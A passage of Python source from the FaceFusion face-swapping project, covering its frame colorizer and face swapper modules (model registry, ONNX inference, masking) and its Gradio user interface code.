'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(source_paths, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/frame_colorizer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.face_analyser import clear_face_analyser from facefusion.content_analyser import clear_content_analyser from facefusion.execution import apply_execution_provider_options from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.common_helper import create_metavar from facefusion.filesystem import is_file, resolve_relative_path, is_image, is_video from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, write_image, unpack_resolution from facefusion.processors.frame.typings import FrameColorizerInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'ddcolor': { 'type': 'ddcolor', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/ddcolor.onnx', 'path': resolve_relative_path('../.assets/models/ddcolor.onnx') }, 'ddcolor_artistic': { 'type': 'ddcolor', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/ddcolor_artistic.onnx', 'path': resolve_relative_path('../.assets/models/ddcolor_artistic.onnx') }, 'deoldify': { 'type': 'deoldify', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/deoldify.onnx', 'path': resolve_relative_path('../.assets/models/deoldify.onnx') }, 'deoldify_artistic': { 'type': 'deoldify', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/deoldify_artistic.onnx', 'path': resolve_relative_path('../.assets/models/deoldify_artistic.onnx') }, 'deoldify_stable': { 'type': 'deoldify', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/deoldify_stable.onnx', 'path': resolve_relative_path('../.assets/models/deoldify_stable.onnx') } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.frame_colorizer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--frame-colorizer-model', help = wording.get('help.frame_colorizer_model'), default = config.get_str_value('frame_processors.frame_colorizer_model', 'ddcolor'), choices = frame_processors_choices.frame_colorizer_models) program.add_argument('--frame-colorizer-blend', help = wording.get('help.frame_colorizer_blend'), type = int, default = config.get_int_value('frame_processors.frame_colorizer_blend', '100'), choices = frame_processors_choices.frame_colorizer_blend_range, metavar = create_metavar(frame_processors_choices.frame_colorizer_blend_range)) program.add_argument('--frame-colorizer-size', help = wording.get('help.frame_colorizer_size'), type = str, default = config.get_str_value('frame_processors.frame_colorizer_size', '256x256'), choices = frame_processors_choices.frame_colorizer_sizes) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.frame_colorizer_model = args.frame_colorizer_model frame_processors_globals.frame_colorizer_blend = args.frame_colorizer_blend frame_processors_globals.frame_colorizer_size = args.frame_colorizer_size def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() def colorize_frame(temp_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() prepare_vision_frame = prepare_temp_frame(temp_vision_frame) with thread_semaphore(): color_vision_frame = frame_processor.run(None, { frame_processor.get_inputs()[0].name: prepare_vision_frame })[0][0] color_vision_frame = merge_color_frame(temp_vision_frame, color_vision_frame) color_vision_frame = blend_frame(temp_vision_frame, color_vision_frame) return color_vision_frame def prepare_temp_frame(temp_vision_frame : VisionFrame) -> VisionFrame: model_size = unpack_resolution(frame_processors_globals.frame_colorizer_size) model_type = get_options('model').get('type') temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_BGR2GRAY) temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_GRAY2RGB) if model_type == 'ddcolor': temp_vision_frame = (temp_vision_frame / 255.0).astype(numpy.float32) temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_RGB2LAB)[:, :, :1] temp_vision_frame = numpy.concatenate((temp_vision_frame, numpy.zeros_like(temp_vision_frame), numpy.zeros_like(temp_vision_frame)), axis = -1) temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_LAB2RGB) temp_vision_frame = cv2.resize(temp_vision_frame, model_size) temp_vision_frame = temp_vision_frame.transpose((2, 0, 1)) temp_vision_frame = numpy.expand_dims(temp_vision_frame, axis = 0).astype(numpy.float32) return temp_vision_frame def merge_color_frame(temp_vision_frame : VisionFrame, color_vision_frame : VisionFrame) -> VisionFrame: model_type = get_options('model').get('type') color_vision_frame = color_vision_frame.transpose(1, 2, 0) color_vision_frame = cv2.resize(color_vision_frame, (temp_vision_frame.shape[1], temp_vision_frame.shape[0])) if model_type == 'ddcolor': temp_vision_frame = (temp_vision_frame / 255.0).astype(numpy.float32) temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_BGR2LAB)[:, :, :1] color_vision_frame = numpy.concatenate((temp_vision_frame, color_vision_frame), axis = -1) color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_LAB2BGR) color_vision_frame = (color_vision_frame * 255.0).round().astype(numpy.uint8) if model_type == 'deoldify': temp_blue_channel, _, _ = cv2.split(temp_vision_frame) color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_BGR2RGB).astype(numpy.uint8) color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_BGR2LAB) _, color_green_channel, color_red_channel = cv2.split(color_vision_frame) color_vision_frame = cv2.merge((temp_blue_channel, color_green_channel, color_red_channel)) color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_LAB2BGR) return color_vision_frame def blend_frame(temp_vision_frame : VisionFrame, paste_vision_frame : VisionFrame) -> VisionFrame: frame_colorizer_blend = 1 - (frame_processors_globals.frame_colorizer_blend / 100) temp_vision_frame = cv2.addWeighted(temp_vision_frame, frame_colorizer_blend, paste_vision_frame, 1 - frame_colorizer_blend, 0) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : FrameColorizerInputs) -> VisionFrame: target_vision_frame = inputs.get('target_vision_frame') return colorize_frame(target_vision_frame) def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(None, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/face_swapper.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import numpy import onnx import onnxruntime from onnx import numpy_helper import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.execution import has_execution_provider, apply_execution_provider_options from facefusion.face_analyser import get_one_face, get_average_face, get_many_faces, find_similar_faces, clear_face_analyser from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, create_region_mask, clear_face_occluder, clear_face_parser from facefusion.face_helper import warp_face_by_face_landmark_5, paste_back from facefusion.face_store import get_reference_faces from facefusion.content_analyser import clear_content_analyser from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import Face, Embedding, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.filesystem import is_file, is_image, has_image, is_video, filter_image_paths, resolve_relative_path from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, read_static_images, write_image from facefusion.processors.frame.typings import FaceSwapperInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None MODEL_INITIALIZER = None NAME = __name__.upper() MODELS : ModelSet =\ { 'blendswap_256': { 'type': 'blendswap', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/blendswap_256.onnx', 'path': resolve_relative_path('../.assets/models/blendswap_256.onnx'), 'template': 'ffhq_512', 'size': (256, 256), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'inswapper_128': { 'type': 'inswapper', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128.onnx', 'path': resolve_relative_path('../.assets/models/inswapper_128.onnx'), 'template': 'arcface_128_v2', 'size': (128, 128), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'inswapper_128_fp16': { 'type': 'inswapper', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/inswapper_128_fp16.onnx', 'path': resolve_relative_path('../.assets/models/inswapper_128_fp16.onnx'), 'template': 'arcface_128_v2', 'size': (128, 128), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'simswap_256': { 'type': 'simswap', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/simswap_256.onnx', 'path': resolve_relative_path('../.assets/models/simswap_256.onnx'), 'template': 'arcface_112_v1', 'size': (256, 256), 'mean': [ 0.485, 0.456, 0.406 ], 'standard_deviation': [ 0.229, 0.224, 0.225 ] }, 'simswap_512_unofficial': { 'type': 'simswap', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/simswap_512_unofficial.onnx', 'path': resolve_relative_path('../.assets/models/simswap_512_unofficial.onnx'), 'template': 'arcface_112_v1', 'size': (512, 512), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] }, 'uniface_256': { 'type': 'uniface', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/uniface_256.onnx', 'path': resolve_relative_path('../.assets/models/uniface_256.onnx'), 'template': 'ffhq_512', 'size': (256, 256), 'mean': [ 0.0, 0.0, 0.0 ], 'standard_deviation': [ 1.0, 1.0, 1.0 ] } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_model_initializer() -> Any: global MODEL_INITIALIZER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if MODEL_INITIALIZER is None: model_path = get_options('model').get('path') model = onnx.load(model_path) MODEL_INITIALIZER = numpy_helper.to_array(model.graph.initializer[-1]) return MODEL_INITIALIZER def clear_model_initializer() -> None: global MODEL_INITIALIZER MODEL_INITIALIZER = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.face_swapper_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: if has_execution_provider('CoreMLExecutionProvider') or has_execution_provider('OpenVINOExecutionProvider'): face_swapper_model_fallback = 'inswapper_128' else: face_swapper_model_fallback = 'inswapper_128_fp16' program.add_argument('--face-swapper-model', help = wording.get('help.face_swapper_model'), default = config.get_str_value('frame_processors.face_swapper_model', face_swapper_model_fallback), choices = frame_processors_choices.face_swapper_models) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.face_swapper_model = args.face_swapper_model if args.face_swapper_model == 'blendswap_256': facefusion.globals.face_recognizer_model = 'arcface_blendswap' if args.face_swapper_model == 'inswapper_128' or args.face_swapper_model == 'inswapper_128_fp16': facefusion.globals.face_recognizer_model = 'arcface_inswapper' if args.face_swapper_model == 'simswap_256' or args.face_swapper_model == 'simswap_512_unofficial': facefusion.globals.face_recognizer_model = 'arcface_simswap' if args.face_swapper_model == 'uniface_256': facefusion.globals.face_recognizer_model = 'arcface_uniface' def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if not has_image(facefusion.globals.source_paths): logger.error(wording.get('select_image_source') + wording.get('exclamation_mark'), NAME) return False source_image_paths = filter_image_paths(facefusion.globals.source_paths) source_frames = read_static_images(source_image_paths) for source_frame in source_frames: if not get_one_face(source_frame): logger.error(wording.get('no_source_face_detected') + wording.get('exclamation_mark'), NAME) return False if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_model_initializer() clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() clear_face_parser() def swap_face(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: model_template = get_options('model').get('template') model_size = get_options('model').get('size') crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), model_template, model_size) crop_mask_list = [] if 'box' in facefusion.globals.face_mask_types: box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], facefusion.globals.face_mask_blur, facefusion.globals.face_mask_padding) crop_mask_list.append(box_mask) if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) crop_vision_frame = prepare_crop_frame(crop_vision_frame) crop_vision_frame = apply_swap(source_face, crop_vision_frame) crop_vision_frame = normalize_crop_frame(crop_vision_frame) if 'region' in facefusion.globals.face_mask_types: region_mask = create_region_mask(crop_vision_frame, facefusion.globals.face_mask_regions) crop_mask_list.append(region_mask) crop_mask = numpy.minimum.reduce(crop_mask_list).clip(0, 1) temp_vision_frame = paste_back(temp_vision_frame, crop_vision_frame, crop_mask, affine_matrix) return temp_vision_frame def apply_swap(source_face : Face, crop_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() model_type = get_options('model').get('type') frame_processor_inputs = {} for frame_processor_input in frame_processor.get_inputs(): if frame_processor_input.name == 'source': if model_type == 'blendswap' or model_type == 'uniface': frame_processor_inputs[frame_processor_input.name] = prepare_source_frame(source_face) else: frame_processor_inputs[frame_processor_input.name] = prepare_source_embedding(source_face) if frame_processor_input.name == 'target': frame_processor_inputs[frame_processor_input.name] = crop_vision_frame with conditional_thread_semaphore(facefusion.globals.execution_providers): crop_vision_frame = frame_processor.run(None, frame_processor_inputs)[0][0] return crop_vision_frame def prepare_source_frame(source_face : Face) -> VisionFrame: model_type = get_options('model').get('type') source_vision_frame = read_static_image(facefusion.globals.source_paths[0]) if model_type == 'blendswap': source_vision_frame, _ = warp_face_by_face_landmark_5(source_vision_frame, source_face.landmarks.get('5/68'), 'arcface_112_v2', (112, 112)) if model_type == 'uniface': source_vision_frame, _ = warp_face_by_face_landmark_5(source_vision_frame, source_face.landmarks.get('5/68'), 'ffhq_512', (256, 256)) source_vision_frame = source_vision_frame[:, :, ::-1] / 255.0 source_vision_frame = source_vision_frame.transpose(2, 0, 1) source_vision_frame = numpy.expand_dims(source_vision_frame, axis = 0).astype(numpy.float32) return source_vision_frame def prepare_source_embedding(source_face : Face) -> Embedding: model_type = get_options('model').get('type') if model_type == 'inswapper': model_initializer = get_model_initializer() source_embedding = source_face.embedding.reshape((1, -1)) source_embedding = numpy.dot(source_embedding, model_initializer) / numpy.linalg.norm(source_embedding) else: source_embedding = source_face.normed_embedding.reshape(1, -1) return source_embedding def prepare_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: model_mean = get_options('model').get('mean') model_standard_deviation = get_options('model').get('standard_deviation') crop_vision_frame = crop_vision_frame[:, :, ::-1] / 255.0 crop_vision_frame = (crop_vision_frame - model_mean) / model_standard_deviation crop_vision_frame = crop_vision_frame.transpose(2, 0, 1) crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0).astype(numpy.float32) return crop_vision_frame def normalize_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = crop_vision_frame.transpose(1, 2, 0) crop_vision_frame = (crop_vision_frame * 255.0).round() crop_vision_frame = crop_vision_frame[:, :, ::-1] return crop_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: return swap_face(source_face, target_face, temp_vision_frame) def process_frame(inputs : FaceSwapperInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') source_face = inputs.get('source_face') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = swap_face(source_face, target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = swap_face(source_face, target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = swap_face(source_face, similar_face, target_vision_frame) return target_vision_frame def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(source_paths) source_face = get_average_face(source_frames) for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_face': source_face, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(source_paths) source_face = get_average_face(source_frames) target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_face': source_face, 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(source_paths, temp_frame_paths, process_frames) File: facefusion/uis/__init__.py File: facefusion/uis/core.py from typing import Dict, Optional, Any, List from types import ModuleType import os import importlib import sys import gradio import facefusion.globals from facefusion.uis import overrides from facefusion import metadata, logger, wording from facefusion.uis.typing import Component, ComponentName from facefusion.filesystem import resolve_relative_path os.environ['GRADIO_ANALYTICS_ENABLED'] = '0' gradio.processing_utils.encode_array_to_base64 = overrides.encode_array_to_base64 gradio.processing_utils.encode_pil_to_base64 = overrides.encode_pil_to_base64 UI_COMPONENTS: Dict[ComponentName, Component] = {} UI_LAYOUT_MODULES : List[ModuleType] = [] UI_LAYOUT_METHODS =\ [ 'pre_check', 'pre_render', 'render', 'listen', 'run' ] def load_ui_layout_module(ui_layout : str) -> Any: try: ui_layout_module = importlib.import_module('facefusion.uis.layouts.' + ui_layout) for method_name in UI_LAYOUT_METHODS: if not hasattr(ui_layout_module, method_name): raise NotImplementedError except ModuleNotFoundError as exception: logger.error(wording.get('ui_layout_not_loaded').format(ui_layout = ui_layout), __name__.upper()) logger.debug(exception.msg, __name__.upper()) sys.exit(1) except NotImplementedError: logger.error(wording.get('ui_layout_not_implemented').format(ui_layout = ui_layout), __name__.upper()) sys.exit(1) return ui_layout_module def get_ui_layouts_modules(ui_layouts : List[str]) -> List[ModuleType]: global UI_LAYOUT_MODULES if not UI_LAYOUT_MODULES: for ui_layout in ui_layouts: ui_layout_module = load_ui_layout_module(ui_layout) UI_LAYOUT_MODULES.append(ui_layout_module) return UI_LAYOUT_MODULES def get_ui_component(component_name : ComponentName) -> Optional[Component]: if component_name in UI_COMPONENTS: return UI_COMPONENTS[component_name] return None def get_ui_components(component_names : List[ComponentName]) -> Optional[List[Component]]: ui_components = [] for component_name in component_names: component = get_ui_component(component_name) if component: ui_components.append(component) return ui_components def register_ui_component(component_name : ComponentName, component: Component) -> None: UI_COMPONENTS[component_name] = component def launch() -> None: ui_layouts_total = len(facefusion.globals.ui_layouts) with gradio.Blocks(theme = get_theme(), css = get_css(), title = metadata.get('name') + ' ' + metadata.get('version')) as ui: for ui_layout in facefusion.globals.ui_layouts: ui_layout_module = load_ui_layout_module(ui_layout) if ui_layout_module.pre_render(): if ui_layouts_total > 1: with gradio.Tab(ui_layout): ui_layout_module.render() ui_layout_module.listen() else: ui_layout_module.render() ui_layout_module.listen() for ui_layout in facefusion.globals.ui_layouts: ui_layout_module = load_ui_layout_module(ui_layout) ui_layout_module.run(ui) def get_theme() -> gradio.Theme: return gradio.themes.Base( primary_hue = gradio.themes.colors.red, secondary_hue = gradio.themes.colors.neutral, font = gradio.themes.GoogleFont('Open Sans') ).set( background_fill_primary = '*neutral_100', block_background_fill = 'white', block_border_width = '0', block_label_background_fill = '*primary_100', block_label_background_fill_dark = '*primary_600', block_label_border_width = 'none', block_label_margin = '0.5rem', block_label_radius = '*radius_md', block_label_text_color = '*primary_500', block_label_text_color_dark = 'white', block_label_text_weight = '600', block_title_background_fill = '*primary_100', block_title_background_fill_dark = '*primary_600', block_title_padding = '*block_label_padding', block_title_radius = '*block_label_radius', block_title_text_color = '*primary_500', block_title_text_size = '*text_sm', block_title_text_weight = '600', block_padding = '0.5rem', border_color_primary = 'transparent', border_color_primary_dark = 'transparent', button_large_padding = '2rem 0.5rem', button_large_text_weight = 'normal', button_primary_background_fill = '*primary_500', button_primary_text_color = 'white', button_secondary_background_fill = 'white', button_secondary_border_color = 'transparent', button_secondary_border_color_dark = 'transparent', button_secondary_border_color_hover = 'transparent', button_secondary_border_color_hover_dark = 'transparent', button_secondary_text_color = '*neutral_800', button_small_padding = '0.75rem', checkbox_background_color = '*neutral_200', checkbox_background_color_selected = '*primary_600', checkbox_background_color_selected_dark = '*primary_700', checkbox_border_color_focus = '*primary_500', checkbox_border_color_focus_dark = '*primary_600', checkbox_border_color_selected = '*primary_600', checkbox_border_color_selected_dark = '*primary_700', checkbox_label_background_fill = '*neutral_50', checkbox_label_background_fill_hover = '*neutral_50', checkbox_label_background_fill_selected = '*primary_500', checkbox_label_background_fill_selected_dark = '*primary_600', checkbox_label_text_color_selected = 'white', input_background_fill = '*neutral_50', shadow_drop = 'none', slider_color = '*primary_500', slider_color_dark = '*primary_600' ) def get_css() -> str: fixes_css_path = resolve_relative_path('uis/assets/fixes.css') overrides_css_path = resolve_relative_path('uis/assets/overrides.css') return open(fixes_css_path, 'r').read() + open(overrides_css_path, 'r').read() File: facefusion/uis/overrides.py from typing import Any import cv2 import numpy import base64 def encode_array_to_base64(array : numpy.ndarray[Any, Any]) -> str: buffer = cv2.imencode('.jpg', array[:, :, ::-1])[1] return 'data:image/jpeg;base64,' + base64.b64encode(buffer.tobytes()).decode('utf-8') def encode_pil_to_base64(image : Any) -> str: return encode_array_to_base64(numpy.asarray(image)[:, :, ::-1]) File: facefusion/uis/choices.py from typing import List from facefusion.uis.typing import WebcamMode common_options : List[str] = [ 'keep-temp', 'skip-audio', 'skip-download' ] webcam_modes : List[WebcamMode] = [ 'inline', 'udp', 'v4l2' ] webcam_resolutions : List[str] = [ '320x240', '640x480', '800x600', '1024x768', '1280x720', '1280x960', '1920x1080', '2560x1440', '3840x2160' ] File: facefusion/uis/typing.py from typing import Literal, Any, IO import gradio File = IO[Any] Component = gradio.File or gradio.Image or gradio.Video or gradio.Slider ComponentName = Literal\ [ 'source_audio', 'source_image', 'target_image', 'target_video', 'preview_frame_slider', 'trim_frame_start_slider', 'trim_frame_end_slider', 'face_selector_mode_dropdown', 'reference_face_position_gallery', 'reference_face_distance_slider', 'face_analyser_order_dropdown', 'face_analyser_age_dropdown', 'face_analyser_gender_dropdown', 'face_detector_model_dropdown', 'face_detector_size_dropdown', 'face_detector_score_slider', 'face_landmarker_score_slider', 'face_mask_types_checkbox_group', 'face_mask_blur_slider', 'face_mask_padding_top_slider', 'face_mask_padding_bottom_slider', 'face_mask_padding_left_slider', 'face_mask_padding_right_slider', 'face_mask_region_checkbox_group', 'frame_processors_checkbox_group', 'face_debugger_items_checkbox_group', 'face_enhancer_model_dropdown', 'face_enhancer_blend_slider', 'face_swapper_model_dropdown', 'frame_colorizer_model_dropdown', 'frame_colorizer_blend_slider', 'frame_colorizer_size_dropdown', 'frame_enhancer_model_dropdown', 'frame_enhancer_blend_slider', 'lip_syncer_model_dropdown', 'output_path_textbox', 'output_video_fps_slider', 'benchmark_runs_checkbox_group', 'benchmark_cycles_slider', 'webcam_mode_radio', 'webcam_resolution_dropdown', 'webcam_fps_slider' ] WebcamMode = Literal['inline', 'udp', 'v4l2'] StreamMode = Literal['udp', 'v4l2'] File: facefusion/uis/components/frame_processors.py from typing import List, Optional import gradio import facefusion.globals from facefusion import wording from facefusion.processors.frame.core import load_frame_processor_module, clear_frame_processors_modules from facefusion.filesystem import list_directory from facefusion.uis.core import register_ui_component FRAME_PROCESSORS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None def render() -> None: global FRAME_PROCESSORS_CHECKBOX_GROUP FRAME_PROCESSORS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.frame_processors_checkbox_group'), choices = sort_frame_processors(facefusion.globals.frame_processors), value = facefusion.globals.frame_processors ) register_ui_component('frame_processors_checkbox_group', FRAME_PROCESSORS_CHECKBOX_GROUP) def listen() -> None: FRAME_PROCESSORS_CHECKBOX_GROUP.change(update_frame_processors, inputs = FRAME_PROCESSORS_CHECKBOX_GROUP, outputs = FRAME_PROCESSORS_CHECKBOX_GROUP) def update_frame_processors(frame_processors : List[str]) -> gradio.CheckboxGroup: facefusion.globals.frame_processors = frame_processors clear_frame_processors_modules() for frame_processor in frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) if not frame_processor_module.pre_check(): return gradio.CheckboxGroup() return gradio.CheckboxGroup(value = facefusion.globals.frame_processors, choices = sort_frame_processors(facefusion.globals.frame_processors)) def sort_frame_processors(frame_processors : List[str]) -> list[str]: available_frame_processors = list_directory('facefusion/processors/frame/modules') return sorted(available_frame_processors, key = lambda frame_processor : frame_processors.index(frame_processor) if frame_processor in frame_processors else len(frame_processors)) File: facefusion/uis/components/preview.py from typing import Any, Dict, Optional from time import sleep import cv2 import gradio import numpy import facefusion.globals from facefusion import logger, wording from facefusion.audio import get_audio_frame, create_empty_audio_frame from facefusion.common_helper import get_first from facefusion.core import conditional_append_reference_faces from facefusion.face_analyser import get_average_face, clear_face_analyser from facefusion.face_store import clear_static_faces, get_reference_faces, clear_reference_faces from facefusion.typing import Face, FaceSet, AudioFrame, VisionFrame from facefusion.vision import get_video_frame, count_video_frame_total, normalize_frame_color, resize_frame_resolution, read_static_image, read_static_images from 